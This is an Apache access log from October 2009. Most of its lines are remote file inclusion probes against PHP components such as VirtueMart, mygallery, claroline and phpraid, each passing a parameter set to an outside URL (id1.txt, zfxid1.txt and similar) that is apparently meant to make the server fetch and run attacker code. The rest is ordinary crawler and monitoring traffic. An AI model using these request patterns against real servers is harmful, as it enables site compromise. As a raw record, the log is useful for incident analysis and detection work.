211.206.120.162 - - [17/Oct/2009:01:01:44 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:02:26 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:02:26 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:02:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:02:32 -0400] "GET /logs/access_log.Q109081900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:02:36 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
87.139.66.104 - - [17/Oct/2009:01:02:36 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
64.27.9.117 - - [17/Oct/2009:01:02:53 -0400] "GET /logs/error_log.Q109092100///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.235.124.69 - - [17/Oct/2009:01:02:56 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.0" 200 1946 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
64.27.9.117 - - [17/Oct/2009:01:03:02 -0400] "GET /logs/access_log.Q109080100///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:01:03:18 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [17/Oct/2009:01:03:19 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.218.40.180 - - [17/Oct/2009:01:03:27 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:01:03:27 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:01:03:27 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
130.13.166.92 - - [17/Oct/2009:01:03:38 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko)"
211.218.40.180 - - [17/Oct/2009:01:04:07 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:09 -0400] "GET /logs/access_log.Q109072200%20%20//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:09 -0400] "GET //?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:09 -0400] "GET /logs//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:04:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.218.40.180 - - [17/Oct/2009:01:04:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:17 -0400] "GET //?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:17 -0400] "GET /logs/access_log.Q109072200%20%20//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:04:17 -0400] "GET /logs//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:04:17 -0400] "GET /logs/error_log.Q109082100///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:01:04:18 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:01:04:18 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:01:04:18 -0400] "GET /logs/access_log.Q109081900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
76.172.23.28 - - [17/Oct/2009:01:04:22 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.27.9.117 - - [17/Oct/2009:01:04:25 -0400] "GET /logs/error_log.Q109092100///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:04:29 -0400] "GET /logs/access_log.Q109080100///snippet.reflect.php?DOCUMENT_ROOT=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:04:30 -0400] "GET /logs/error_log.Q109082100///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:05:10 -0400] "GET ///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:05:11 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:05:11 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:06:05 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:06:09 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:06:09 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:06:09 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:06:17 -0400] "GET /logs/access_log.Q109093000%20%20///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:06:26 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:06:52 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.816"
87.139.66.104 - - [17/Oct/2009:01:06:57 -0400] "GET /logs/access_log.Q109080400/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.816"
87.139.66.104 - - [17/Oct/2009:01:06:57 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.816"
87.139.66.104 - - [17/Oct/2009:01:07:04 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.816"
222.236.47.182 - - [17/Oct/2009:01:07:10 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:07:21 -0400] "GET /logs/access_log.Q109081500///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:01:07:33 -0400] "GET /logs/error_log.Q109072300%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:07:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:07:55 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:07:55 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:32 -0400] "GET ///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:32 -0400] "GET /logs///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:33 -0400] "GET /logs/access_log.Q109072200%20%20///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:33 -0400] "GET /logs/error_log.Q109061500%20%20///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:01:08:41 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:42 -0400] "GET ///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:42 -0400] "GET /logs///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:42 -0400] "GET /logs/access_log.Q109072200%20%20///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:08:43 -0400] "GET /logs/error_log.Q109061500%20%20///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:08:43 -0400] "GET ///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:08:44 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:08:44 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:01:08:46 -0400] "GET /logs/access_log.Q109092400/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:01:08:46 -0400] "GET /logs/access_log.Q109080100/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.29.20.126 - - [17/Oct/2009:01:09:10 -0400] "GET /logs/access_log.Q109081500///claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:09:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.44.250.68 - - [17/Oct/2009:01:09:40 -0400] "GET /logs/access_log.Q109093000%20%20///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:11:30 -0400] "GET /logs/access_log.Q109072200///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:11:30 -0400] "GET /logs/error_log.Q109061500///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:41 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:41 -0400] "GET /logs/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:41 -0400] "GET /errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:42 -0400] "GET /logs/access_log.Q109080900/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:11:45 -0400] "GET ///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:11:45 -0400] "GET /logs///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:11:45 -0400] "GET /logs/access_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:11:45 -0400] "GET /logs/error_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:48 -0400] "GET /errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:48 -0400] "GET /logs/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:48 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:11:50 -0400] "GET /logs/access_log.Q109072200///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:11:50 -0400] "GET /logs/error_log.Q109061500///announcements.php?phpraid_dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:11:57 -0400] "GET /logs/access_log.Q109080900/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:11:59 -0400] "GET /logs///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:11:59 -0400] "GET /logs/access_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:11:59 -0400] "GET ///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:11:59 -0400] "GET /logs/error_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:01:12:00 -0400] "GET /logs/access_log.Q109072200//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:12:00 -0400] "GET /logs/access_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:12:00 -0400] "GET /logs/error_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:17 -0400] "GET /logs/access_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:17 -0400] "GET /logs/error_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:45 -0400] "GET /logs///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:45 -0400] "GET ///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:45 -0400] "GET /logs/access_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:12:45 -0400] "GET /logs/error_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:13:01 -0400] "GET /logs/access_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:13:01 -0400] "GET /logs/error_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:13:39 -0400] "GET /logs//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:13:39 -0400] "GET //mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:13:40 -0400] "GET /logs/access_log.Q109072200//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:13:52 -0400] "GET /logs/access_log.Q109092000//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:14:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.2.21 - - [17/Oct/2009:01:14:34 -0400] "GET /logs/access_log.Q109072200//?p=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:20 -0400] "GET ///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:20 -0400] "GET /logs///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:20 -0400] "GET /logs/access_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:20 -0400] "GET /logs/error_log.Q109081800%20%20///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:34 -0400] "GET /logs/access_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.19.172 - - [17/Oct/2009:01:15:34 -0400] "GET /logs/error_log.Q109081800///bbs//skin/daerew_GDgallery/setup.php?dir=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:15:53 -0400] "GET //mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:15:53 -0400] "GET /logs//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:15:53 -0400] "GET /logs/access_log.Q109072200//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.182 - - [17/Oct/2009:01:15:53 -0400] "GET /logs/access_log.Q109092500//mail.inc.php?skin_board_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
166.205.132.83 - - [17/Oct/2009:01:16:50 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
209.59.12.99 - - [17/Oct/2009:01:19:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [17/Oct/2009:01:19:53 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.43.202.66 - - [17/Oct/2009:01:19:53 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
166.205.131.3 - - [17/Oct/2009:01:20:37 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7D11"
220.181.7.73 - - [17/Oct/2009:01:20:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.206.120.162 - - [17/Oct/2009:01:20:59 -0400] "GET //mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:21:00 -0400] "GET /logs/access_log.Q109072200//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
